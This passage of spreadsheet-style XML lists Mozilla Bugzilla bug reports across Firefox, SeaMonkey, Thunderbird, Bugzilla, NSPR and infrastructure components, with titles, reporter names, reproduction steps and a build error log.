To get a full picture a user must look in both places. Additionally there is no equivalent of the horizontal progress meter on background pages.
One way of combining both the throbber and the progress meter would be to use a pie chart inside the throbber ring that progressively fills in until the load is complete.
Art to follow.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-476462</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Eric Cooper </t>
  </si>
  <si>
    <t>Created attachment 360080
public ssh key
ssh public key is attached.
I will be faxing the contributor agreement sometime this afternoon (EST).</t>
  </si>
  <si>
    <t>smirkingsisyphus</t>
  </si>
  <si>
    <t>SEAMONKEY-314027</t>
  </si>
  <si>
    <t>Search messages only searches the first message</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050715 Firefox/1.0.6 SUSE/1.0.6-4.3
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20051027 SeaMonkey/1.1a
When searching messages (either quick search or Tools-&gt;Search Messages) the search criteria are applied only to the first message per folder and the search results will show zero or one message per searched folder (depending on if the first message matched).
For example searching for Sender contains @ in all your folders will return the first message of each folder but I would expect to see all messages.
Reproducible: Always
Steps to Reproduce:
Type @ in the quick search field
Actual Results:  
Only the first message will remain
Expected Results:  
All messages remain
Self-compiled seamonkey 20051027 trunk SuSE9.2 gtk2-2.4.9-10.1 glib2-2.4.6-5 glibc-2.3.3-118 kernel-smp-2.6.8-24.17</t>
  </si>
  <si>
    <t>hyc</t>
  </si>
  <si>
    <t>bertramf</t>
  </si>
  <si>
    <t>CORE-384116</t>
  </si>
  <si>
    <t>Pasting an image from clipboard uses bad quality JPEG-compression (non-user selectable)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.4) Gecko/20070531 BonEcho/2.0.0.4 (tete009 G7 SSE2)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a5pre) Gecko/20070506 SeaMonkey/1.5a
When pasting an image from the system clipboard to a Composer window Composer correctly creates a new image file on disk for this.
However it saves by default in JPEG and with very low quality compression (esp. for line graphic images like charts) causing bad visual artifacts and making small text in the image impossible to see.
This is reproducible and happens every time regardless of what kind of an image is in the clipboard to be copied.
Workaround is to save each image manually to a file OUTSIDE Composer and then manually link each image from within composer (from the files created).
However this is very tedious and time-consuming when editing existing web pages and copying multiple images from other applications.
Reproducible: Always
Steps to Reproduce:
1.Copy an image of your choice to clipboard pref. of original quality (no previous compression) one with line graphics and some text in the image. A time series chart with a title and X &amp; Y axis labels is a a good example
2. Paste the image from clipboard to a composer Edit window (Ctrl+V).
Actual Results:  
Compare the original image (clipboard) vs the one now in the Composer window. See how badly the jpeg compression destroys the image contents in the CompoÃ¶ser copy.
Expected Results:  
1. User selectable Image format (JPEG/JFIFF PNG GIF etc) format and compression ratio (for JPEG and PNG at least) in the preferences.
2. Additionally by default the compression ratio for jpeg (if jpeg format is default) should be lower resulting in less image artifacts in the copy/pasted images.</t>
  </si>
  <si>
    <t>pasi.keinanen</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-496109</t>
  </si>
  <si>
    <t>Registration &amp; Management</t>
  </si>
  <si>
    <t>[nso] Northern Sotho: Firefox</t>
  </si>
  <si>
    <t>This is for the inclusion of Northern Sotho into Firefox.
The following are about our status and strategy forward.
As mentioned in bug 415645 at this stage the areas that we've worked on specifically are user1 user2 and config1.  We're focusing on highly user visible parts of Firefox. We started with a full terminology review and created Firefox specific terminology to ensure conformance across the platform.  Each gaol is being thoroughly reviewed and updated with terminology and style being aligned.
Through each stage we have been running pofilter checks to ensure that the work is technically correct.
In terms of progress in percentage we're at 60% of the words 70% of strings.  All of these translations outside of user12 and config1 still need to be reviewed. Thus in terms of the coverage that has been completely review as against the total of +-21000 words we are at 37% of the total.
Our strategy from here on is to work through user3 and config2. We will then tackle all other areas.  Once translations are complete we will then run our checks using poconflicts to ensure consistency.
We hope to begin with in product reviews as soon as we have language packs.  We will use podebug to make Northern Sotho builds with tags for quick fixing of errors.</t>
  </si>
  <si>
    <t>registration</t>
  </si>
  <si>
    <t>BUGZILLA-509035</t>
  </si>
  <si>
    <t>An empty e-mail gets sent to non-timetrackinggroup members if I change time tracking information</t>
  </si>
  <si>
    <t>This affects trunk and branch.
If I change time tracking information an empty mail gets sent to non-timetrackinggroup members (i.e. only header buglink and footer). (E-mail preferences set to receive all mail.) The changed field (I tried deadline) or its values are not included in the mail (which is good) but the header field X-Bugzilla-Changed-Fields mentions it (which is not good).
If only time tracking information is changed in a bug then no mail must be sent to non-timetrackinggroup members at all.
If both time tracking information and other information is changed in a bug then a mail must be sent to non-timetrackinggroup members but the X-Bugzilla-Changed-Fields mail header field must not disclose changed time tracking fields.</t>
  </si>
  <si>
    <t>INSTANTBIRD-954071</t>
  </si>
  <si>
    <t>Demo Add-ons</t>
  </si>
  <si>
    <t>INSTANTBIRD</t>
  </si>
  <si>
    <t>[addons - colorize] Stop overlaying instantbird.xul</t>
  </si>
  <si>
    <t>*** Original post on bio 635 by Mook  at 2010-12-19 01:03:00 UTC ***
*** Due to BzAPI limitations the initial description is in comment 1 ***</t>
  </si>
  <si>
    <t>mook.moz+mozbz</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-327488</t>
  </si>
  <si>
    <t>Drag &amp; Drop</t>
  </si>
  <si>
    <t>[10.4] Can't drag page proxy to mail.app compose window</t>
  </si>
  <si>
    <t>steps:
- load a web page
- launch mail.app and open a compose window
- drag page proxy from camino to compose window
expected:
- should get green (+) and drop
actual:
- springs back
urls dragged from the webpage work fine it's just the page proxy.</t>
  </si>
  <si>
    <t>SEAMONKEY-158626</t>
  </si>
  <si>
    <t>cvs remove xpfe\browser\resources\content\fastnav.js</t>
  </si>
  <si>
    <t>fastnav.js is just dead end code which takes up cycles to maintain when it 
is not used for anything. Remove it r=bzbarsky sr=bryner.</t>
  </si>
  <si>
    <t>THUNDERBIRD-285831</t>
  </si>
  <si>
    <t>Opening accountmanager from mail compose leads to a blank account panel</t>
  </si>
  <si>
    <t>open a compose window
tools / account settings
notice the blank white empty accountmanager panel
JS error says 
Error: selectedServer has no properties
Source File: chrome://messenger/content/AccountManager.js
Line: 170</t>
  </si>
  <si>
    <t>MOZILLA_QA_GRAVEYARD-511314</t>
  </si>
  <si>
    <t>Mozmill Tests</t>
  </si>
  <si>
    <t>MOZILLA_QA_GRAVEYARD</t>
  </si>
  <si>
    <t>[mozmill] Test for verifying BLUE Larry</t>
  </si>
  <si>
    <t>This is a placeholder bug for creating a Mozmill test script for https://litmus.mozilla.org/show_test.cgi?id=6872</t>
  </si>
  <si>
    <t>anthony.s.hughes</t>
  </si>
  <si>
    <t>FIREFOX-424690</t>
  </si>
  <si>
    <t>search-go-button don't ignore right click</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b5pre) Gecko/2008032405 Minefield/3.0b5pre
when right-clicking on the search button of searchbar search results should not be loaded in the content area.
Reproducible: Always
Steps to Reproduce:
1. Right click the magnifier button on the searchbar.
Actual Results:  
Toolbar-customization popup is opened and at the same time search results is loaded in the current tab.
Expected Results:  
Toolbar-customization popup is opened.</t>
  </si>
  <si>
    <t>sevenfurnace</t>
  </si>
  <si>
    <t>NSPR-96199</t>
  </si>
  <si>
    <t>memory leak in prmwait.c</t>
  </si>
  <si>
    <t>various static variables are not destroyed.
please add the following function to prmwait.c
and call from somewhere near the bottom of PR_Cleanup():
void _PR_CleanupMW(void)
{
	PR_DestroyLock(mw_lock)
	mw_lock = NULL
	PR_Free(mw_state)
	mw_state = NULL
}</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-515013</t>
  </si>
  <si>
    <t>German localization: Change the keyboard accelerator for the Add-ons list from Alt-A to Alt-D</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
In the German localization the Add-Ons entry in the Extras menu can be accessed by pressing Alt-X (for the extras menu) &amp; (Alt-)A for Add-ons.
This choice of an accelerator key is annoying for two reasons:
1. A doesn't activate the menu item if adblock is installed because of an duplicate shortcut.
2. More importantly in Thunderbird the Add-ons entry is mapped to D. So in Thunderbird you press Alt-X D to get the Add-ons list.
I'd suggest to change FF's German shortcuts:
- Use O or W for Download (currently mapped to D but the Download list has a shortcut of its own anyway)
- Use D for Add-ons (at least for consistency with Thunderbird)
Reproducible: Always</t>
  </si>
  <si>
    <t>samul</t>
  </si>
  <si>
    <t>CORE-7619</t>
  </si>
  <si>
    <t>Can't unregister component with RegFactory -u dllname</t>
  </si>
  <si>
    <t>The -u option in RegFactory doesn't seem to work.  I was trying to unregister a
component using the command RegFactory -u mydll.so and it return an error
code of 0x80040154.</t>
  </si>
  <si>
    <t>carl.wong</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-151105</t>
  </si>
  <si>
    <t>speedyj.com - alert says to use NS4 instead</t>
  </si>
  <si>
    <t>This site was professionally developed only recently and listed in web design
sites for its cutting edge Flash.
The JavaScript detects the user agent and seems to parse the version number and
platform and assuming that Gecko is pre Netscape 4 gives the following message:
this browser not optimal for this site
use netscape 4.x or explorer 4.x /5.x for optimal performance
And then redirects to a missing page. There is very little which wouldn't work
on earlier browsers it's almost all flash. 
I explained the problem politely and offered a fix but they declined and said
they couldn't accommodate everybody.</t>
  </si>
  <si>
    <t>christo</t>
  </si>
  <si>
    <t>SEAMONKEY-341628</t>
  </si>
  <si>
    <t>Seamonkey hangs when trying to install french language pack</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060613 SeaMonkey/1.5a
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060613 SeaMonkey/1.5a
With the last release of Seamonkey I wanted to install the French Language pack.
But Seamonkey hangs on the Software Installation box the Download and installation status gauge doesn't change clicking on cancel doesn't act nor clicking on the close cross the only way I've found to close it is xkill.
Reproducible: Always
Steps to Reproduce:
1.Open Preferences/Appearance/Languages
2.Click on Download More button 
3.The http://www.mozilla.org/projects/l10n/postinst-notes/sm10.html is opened
4.The the Software Installation box shows up
5 Click on install
6 See the Download and installation status gauge and wait : nothing happens
7 Click on Cancel Button : Nothing happens
8 Click on Close Button : Nothing happens
9 Close Seamonkey : It closes but not the Download and installation status gauge 
10 run Xkill and kill the message box
I tried to modify software configuration to allow mozilla.org to install stuff but when I click on the Allow button in the box nothing happens : the site name doesn't had to the list.
I also tried to had the french language in the Preferences/Navigator/Languages box I choose French/France (fr-Fr) or French (fr) and had it. It shows at the end of the list then I click on the move up button to put it in first place but nothing happens. I click on English language then on the move down button to put it below French but nothing happens...
I'm a bit locked with this :(</t>
  </si>
  <si>
    <t>xpi-packages</t>
  </si>
  <si>
    <t>CORE-506081</t>
  </si>
  <si>
    <t>dataTransfer.setData makes scrollbars draggable off of themselves on dragstart events</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US-Hixie rv:1.9.1.2pre) Gecko/20090723 Shiretoko/3.5.2pre
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US-Hixie rv:1.9.1.2pre) Gecko/20090723 Shiretoko/3.5.2pre
Scrollbars (and every part of their UI) become draggable akin the effect seen in bug 24024 when dataTransfer.setData is used in a dragstart event that was fired on a scrollbar.
This bug affects any website that uses the CiteDrag JavaScript library ( http://github.com/eligrey/CiteDrag/tree/master ) which includes my blog.
Reproducible: Always
Steps to Reproduce:
1. document.addEventListener(dragstart function(e) {e.dataTransfer.setData(text/vnd.initech.foobar)} false)
2. Drag a part of a scrollbar UI
Actual Results:  
Scrollbar UI part is dragged off itself (copied not removed).
Expected Results:  
Scrollbar UI part functions normally.
Side-question: Are scrollbars part of the DOM?</t>
  </si>
  <si>
    <t>BUGZILLA-289139</t>
  </si>
  <si>
    <t>Bugzilla::DB::Schema::Pg needs to re-create indexes when it has to drop them for a rename/alter</t>
  </si>
  <si>
    <t>Because of Pg's wonderful ALTER TABLE limitations we have to actually drop and
re-create columns when we want to alter them or rename them.
Unfortunately this drops all indexes that were on that column so they need to
be regenerated.
It should be pretty easy we just need a function to tell us all the indexes
that are on a particular column and then we need to get the index_ddl to
re-create them.</t>
  </si>
  <si>
    <t>FIREFOX-358179</t>
  </si>
  <si>
    <t>I get high CPU utilization even when the firefox window is blank (70-95%)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.8.1) Gecko/20061010 Firefox/2.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.8.1) Gecko/20061010 Firefox/2.0
It seems the new firefox 2.0 displays high CPU utilization even when not really viewing any pages. I saw others report this while viewing pages but in my case there are NO pages.
Reproducible: Always
Steps to Reproduce:
1.Launch firefox 
2.No need to go to any page I use a blank homepage
3.
Actual Results:  
Extremely high CPU utilization
Expected Results:  
0% utilization. As it is I don't want to use firefox any longer.</t>
  </si>
  <si>
    <t>dikrek</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-344198</t>
  </si>
  <si>
    <t>Firefox trunk build (bm-xserve02) not universal</t>
  </si>
  <si>
    <t>The Mac trunk Firefox build on bm-xserve02 isn't universal it's ppc-only.
And it's not even right for a ppc-only build: it's built with gcc 4.0 and the 10.4 SDK which produces something that can only run on 10.3.9 and later.
To turn this into a true universal build the universal switch needs to be turned on in tinder-config AND the universal mozconfig needs to be sourced in mozconfig.
To leave it a ppc-only build but fix it so that it's a proper release-quality ppc build the mozconfig needs to set the SDK to 10.2.8 (or 10.3.9? - it is the trunk after all) and the compiler needs to be set to gcc-3.3 either by setting CC and CXX in mozconfig or by running gcc_select.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-476966</t>
  </si>
  <si>
    <t>monitor for inactive Talos machines.</t>
  </si>
  <si>
    <t>If a machine has stopped reporting test results for a given length of time (8 hours? 12 hours? 24 hours?) and it is marked as 'active' in the db then it should be reported as an error (maybe another simple html page?).  This would help to catch machines that are frozen or otherwise blocked from testing.</t>
  </si>
  <si>
    <t>CORE-99522</t>
  </si>
  <si>
    <t>nsHttpConnectionInfo need not inherit from nsISupports</t>
  </si>
  <si>
    <t>nsHttpConnectionInfo need not inherit from nsISupports.  It needs to be
referenced counted but it does not need to have a virtual function table.</t>
  </si>
  <si>
    <t>TOOLKIT-384874</t>
  </si>
  <si>
    <t>Each element within grid|columns creates a new column</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.9a6pre) Gecko/20070617
In th latest XULRunner builds each element within a grid's columns element creates it's own column. In previous version one could place a spacer or a splitter between column elements and only column elements created a column.
see also bug 376246 for the history of this bug
Reproducible: Always</t>
  </si>
  <si>
    <t>BUGZILLA-272322</t>
  </si>
  <si>
    <t>let me delete a component from the edit screen</t>
  </si>
  <si>
    <t>steps:
1. load url
expected results:
button/link which lets me delete the component should require confirmation just
like the other page.
actual results:
no such item :)</t>
  </si>
  <si>
    <t>SOCORRO_GRAVEYARD-701600</t>
  </si>
  <si>
    <t>Middleware</t>
  </si>
  <si>
    <t>SOCORRO_GRAVEYARD</t>
  </si>
  <si>
    <t>[Tracker] Move SQL queries from WebApp to Middleware</t>
  </si>
  <si>
    <t>This bug is to track all the bugs related to moving SQL queries that still live in the webapp to appropriate services in the middleware. 
Also we need the middleware reorganization to be done before anything else can be worked on.</t>
  </si>
  <si>
    <t>SEAMONKEY-398172</t>
  </si>
  <si>
    <t>Junk mails are handled correctly but Junk-Flag is not displayed in window.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.9a9pre) Gecko/2007092902 SeaMonkey/2.0a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.9a9pre) Gecko/2007092902 SeaMonkey/2.0a1pre
When messages are downloaded they should be marked (flagged)  as junk or no-junk or with ? as uncertain. Junk-mails are to be handled according to the setting of the mail-account.  The handling functionality works however the flags are not displayed.
Reproducible: Always
Steps to Reproduce:
1. run SM on default theme
2. get messages
3. no ? or Thrash-symbol to be seen.
Actual Results:  
no ? displayed no thrash symbol displayed. 
Expected Results:  
mark mails urea with ?
spam with Junk symbol
read with dot.
seems to be a display problem only. Junk filter is working.</t>
  </si>
  <si>
    <t>otto.koehn</t>
  </si>
  <si>
    <t>CORE-49648</t>
  </si>
  <si>
    <t>stylesheets leaked when manipulated from JS</t>
  </si>
  <si>
    <t>The code that does alternate stylesheet selection in the browser (View | Use
Stylesheet) just uses JS to manipulate the stylesheets.  It leaks.  (I just
fixed one minor leak that I'll check in soon but that's not this bug.)
STEPS TO REPRODUCE:
 * load http://www.people.fas.harvard.edu/~dbaron/
 * Select View | Use Stylesheet | Ultramarine
RESULTS:
 * leak a bunch of CSSStyleSheetImpl and one HTMLStyleSheetImpl
I was looking at the HTMLStyleSheetImpl here -- I assume the others are similar.
We leak multiple references to the object all acquired on line 91 of
nsJSStyleSheetList.cpp in the function GetStyleSheetListProperty when calling
Item.  I'm not sure how these references are supposed to work - i.e. whether
they should be garbage-collected or what.  But they leak.</t>
  </si>
  <si>
    <t>BUGZILLA-224148</t>
  </si>
  <si>
    <t>Setting review+ flag sends flag setter mail if there was no review? flag</t>
  </si>
  <si>
    <t>VERSION:  Whatever bugzilla.mozilla.org runs
PROBLEM DESCRIPTION:
If I set review+ on a patch which had no review? flag I get an email
telling me that I fulfilled my own request (which I never made of course).
I know I set the flag.  I don't need to get mail about it.  I certainly don't
need misleading mail about it....
I can't recall this ever happening before and I'm pretty sure I've encountered
this exact situation after the new request system was in place.  Did the
mozilla.org version of bugzilla get updated recently?
See also bug 223420 and bug 214179 for similar issues...</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-316674</t>
  </si>
  <si>
    <t>compare-locales should support reasonable numbers of ordered search</t>
  </si>
  <si>
    <t>In trademarks reviews for 1.5 we permitted locales to have less or more
ordered search plugins than the two we have in en-US compare-locales
should support that.
http://lxr.mozilla.org/mozilla1.8/source/browser/locales/en-US/chrome/browser-region/region.properties#13
is the reference.
I'll attach a patch in a minute and I'd like us to take that into the build
for 1.5 so that we can see what is actually green and what is not.
I tested my modified version on the hy-AM and ja locales hy-AM has the same 
errors ja just doesn't have the browser.search.order ones anymore.
I made up my mind to not require a single ordered one but this is just an
arbitrary decision for now every locale has at least one.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-488397</t>
  </si>
  <si>
    <t>Move 4 minis from build to try network</t>
  </si>
  <si>
    <t>We'd like to move 
   moz2-darwin9-slave09.build.m.o
   moz2-darwin9-slave10.build.m.o
   moz2-darwin9-slave11.build.m.o
   moz2-darwin9-slave12.build.m.o
to the try server vlan as 
   try-mac-slave06.m.o
   try-mac-slave07.m.o
   try-mac-slave08.m.o
   try-mac-slave09.m.o
There's a big backlog on the try server so we'd like to get this done asap using the reboot-at-the-same-time-as-you-change-the-vlan trick. If that fails out then we fall back to fixing them up tomorrow morning when Phong is in the colo.</t>
  </si>
  <si>
    <t>SEAMONKEY-479448</t>
  </si>
  <si>
    <t>Closed tabs need to be deleted when browser history is cleared</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2
Build Identifier:  Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20090220 SeaMonkey/2.0b1pre
Since closed tabs in SeaMonkey are tied to the browser history if the user uses the Tools-&gt;Clear Private Data... menu and then clears the Browsing History SeaMonkey needs to clear the stored closed tabs.  Otherwise if the user uses the Undo Close Tab tab bar content menu entry a blank tab is opened that cannot be closed.
Reproducible: Always
Steps to Reproduce:
1. Close one or more tabs
2. Click the Tools-&gt;Clear Private Data... menu item.
3. In the window that opens check the Browsing History and click Clear Private Data Now
4. Right click tab bar and select Undo Close Tab
Actual Results:  
A blank tab opens.  This tab cannot be closed.
Expected Results:  
The Undo Close Tab open should be grayed out as there should not be any closed tabs to restore.
Something in SeaMonkey needs to observe the browser:purge-session-history notification and wipe out each window's savedBrowsers array when observed. I would suggest either browser.xml or tabbrowser.xml do this.  I think the later would make more sense.</t>
  </si>
  <si>
    <t>morac99-firefox2</t>
  </si>
  <si>
    <t>NSS-81358</t>
  </si>
  <si>
    <t>The internal pkcs11 module should be a loadable module.</t>
  </si>
  <si>
    <t>The internal pkcs11 module should be a loadable module(We do not load it)so we 
can only use the certifcates and cryptogram service in other device other than 
in internal pkcs1 moudle.</t>
  </si>
  <si>
    <t>zhou.bin</t>
  </si>
  <si>
    <t>CORE-358023</t>
  </si>
  <si>
    <t>Mingw build error in nsNotifyAddrListener.cpp</t>
  </si>
  <si>
    <t>I get a build error in current trunk builds:
\1.9a1\ -DMOZILLA_REGION_VERSION=\1.9a1\ -DMOZILLA_SKIN_VERSION=\1.8\  -D_
MOZILLA_CONFIG_H_ -DMOZILLA_CLIENT /cygdrive/c/mozilla/mozilla/netwerk/system/wi
n32/nsNotifyAddrListener.cpp
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:58: error: `PIP
_ADAPTER_ADDRESSES' has not been declared
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:59: error: ISO
C++ forbids declaration of `parameter' with no type
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp: In member func
tion `DWORD nsNotifyAddrListener::CheckAdaptersAddresses()':
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:388: error: `GA
A_FLAG_SKIP_FRIENDLY_NAME' was not declared in this scope
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:388: error: `GA
A_FLAG_SKIP_ANYCAST' was not declared in this scope
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:389: error: `GA
A_FLAG_SKIP_MULTICAST' was not declared in this scope
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:389: error: `GA
A_FLAG_SKIP_DNS_SERVER' was not declared in this scope
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:396: warning: c
onverting to non-pointer type `int' from NULL
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:398: error: `PI
P_ADAPTER_ADDRESSES' was not declared in this scope
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:398: error: exp
ected `' before addresses
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:399: error: `ad
dresses' was not declared in this scope
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:402: error: exp
ected `' before ptr
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:405: error: `pt
r' was not declared in this scope
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:406: error: `If
OperStatusUp' was not declared in this scope
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:407: error: `IF
_TYPE_SOFTWARE_LOOPBACK' was not declared in this scope
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:406: warning: u
nused variable 'IfOperStatusUp'
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:407: warning: u
nused variable 'IF_TYPE_SOFTWARE_LOOPBACK'
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:387: warning: u
nused variable 'flags'
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:388: warning: u
nused variable 'GAA_FLAG_SKIP_FRIENDLY_NAME'
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:388: warning: u
nused variable 'GAA_FLAG_SKIP_ANYCAST'
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:389: warning: u
nused variable 'GAA_FLAG_SKIP_MULTICAST'
c:/mozilla/mozilla/netwerk/system/win32/nsNotifyAddrListener.cpp:389: warning: u
nused variable 'GAA_FLAG_SKIP_DNS_SERVER'
make[6]: *** [nsNotifyAddrListener.o] Error 1
make[6]: Leaving directory `/cygdrive/c/mozilla/mozilla/netwerk/system/win32'
make[5]: *** [libs] Error 2
make[5]: Leaving directory `/cygdrive/c/mozilla/mozilla/netwerk/system'
make[4]: *** [libs] Error 2
make[4]: Leaving directory `/cygdrive/c/mozilla/mozilla/netwerk'
make[3]: *** [libs_tier_necko] Error 2
make[3]: Leaving directory `/cygdrive/c/mozilla/mozilla'
make[2]: *** [tier_necko] Error 2
make[2]: Leaving directory `/cygdrive/c/mozilla/mozilla'
make[1]: *** [alldep] Error 2
make[1]: Leaving directory `/cygdrive/c/mozilla/mozilla'
make: *** [alldep] Error 2
I think this build error happens because of the patch from bug 354984.</t>
  </si>
  <si>
    <t>THUNDERBIRD-491016</t>
  </si>
  <si>
    <t>Folder and Message Lists</t>
  </si>
  <si>
    <t>Messages cannot be moved from Inbox to Folders using Search Messages file button</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4
Build Identifier: Thunderbird Version 3.0b3pre
With the installation of the latest nightly build I am no longer able to move messages from the search window using the file option.  Can move messages individually from inbox to folder by drag and drop.
Reproducible: Always
Steps to Reproduce:
1. Search for messages meeting a specific criteria
2. Select message or messages in search box3.
3. Attempt to move using file button.
Actual Results:  
Nothing happens.  Messages remain in inbox.
Expected Results:  
Messages to be moved to selected folder.
It should have moved the files.</t>
  </si>
  <si>
    <t>herm.harrison</t>
  </si>
  <si>
    <t>CORE-274521</t>
  </si>
  <si>
    <t>CSS (border) on FRAMESET causes smudge when scrolling</t>
  </si>
  <si>
    <t>If I use this style rule:
frameset {border: 1px solid blue}
And then *scroll* the frame the styled border (blue line) gets drawn over the
webpage repeatedly. See the attachment for exact meaning.
The frames should be scrolled both up and down for maximum effect.</t>
  </si>
  <si>
    <t>nrlz</t>
  </si>
  <si>
    <t>CORE-88747</t>
  </si>
  <si>
    <t>nsCRT::atoi should be removed or fixed</t>
  </si>
  <si>
    <t>|nsCRT::atoi| (according to a compiler warning pointed out by timeless and by
inspection) just recurses infinitely.  |::atoi| takes a |char*|.  So we should
probably just remove it unless someone wants to write one for |PRUnichar*|...</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-529913</t>
  </si>
  <si>
    <t>Need Test Pilot staging set up</t>
  </si>
  <si>
    <t>I'm working on transitioning http://testpilot.mozillalabs.com/testcases/ into Wordpress locally and need to get a staging server set up for http://testpilot.mozillalabs.com/.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-989521</t>
  </si>
  <si>
    <t>Need a WinXP test slave</t>
  </si>
  <si>
    <t>I'd like access to a Windows XP test slave so that I can debug bug 989520.</t>
  </si>
  <si>
    <t>bill.mccloskey</t>
  </si>
  <si>
    <t>THUNDERBIRD-239475</t>
  </si>
  <si>
    <t>attachment bucket does not always show correct icon for attachments</t>
  </si>
  <si>
    <t>If you drag mail attachments into the attachment bucket the icon to the left of
the attachment name does not always reflect the correct content type of the
attachment.
Same goes if you drag a web page link that has a query or reference string after
the file name such as:
http://lxr.mozilla.org/mozilla/source/mailnews/imap/src/nsImapIncomingServer.cpp#1286
We should take the attachment url try to turn it into a nsIURI object and then
ask for the file name.</t>
  </si>
  <si>
    <t>CORE-487972</t>
  </si>
  <si>
    <t>64-bit fixes for nsPluginsDirDarwin</t>
  </si>
  <si>
    <t>Created attachment 372251
fix v1.0
Some 64-bit fixes and code cleanup for nsPluginsDirDarwin.
We'll still need the patch in bug 468678 or 64-bit ifdefs to get rid of the rest of the code that won't work in 64-bit.</t>
  </si>
  <si>
    <t>CORE-300816</t>
  </si>
  <si>
    <t>mlb.com - menu dividers are in the wrong place (inline abs pos containing block)</t>
  </si>
  <si>
    <t>This is related to
http://reporter.mozilla.org/app/report/?report_id=RMO11210914223764&amp;submit_reportID=Lookup+Report
 but I'm not sure what the reporter  bugzilla method will be so I'm
reporting it here too.
Since at least Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b3) Gecko/20050710
Firefox/1.0+ and including Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8b3)
Gecko/20050714 Firefox/1.0+ the menu dividers on MLB pages (but it's especially
noticeable on bluejays.com) are being put in the wrong place.
I.e. usually you'd get Multimedia | News | Roster | ... but now we're getting
something more like Multimedia   |News   |Roster (with the divider actually
overlapping the string slightly).</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-191474</t>
  </si>
  <si>
    <t>Eliminate useless GTK painting</t>
  </si>
  <si>
    <t>As I explained in my email GFX-GTK seems to repaint in response to
Invalidate()s without checking to see if the invalidated area is actually
visible. We should restrict the area to be repainted to the visible area to the
extent we can.
We should also pass the paint region to the view manager instead of breaking it
up into rects and passing them one at a time. The view manager is quite capable
of painting a region intelligently.</t>
  </si>
  <si>
    <t>CORE-428415</t>
  </si>
  <si>
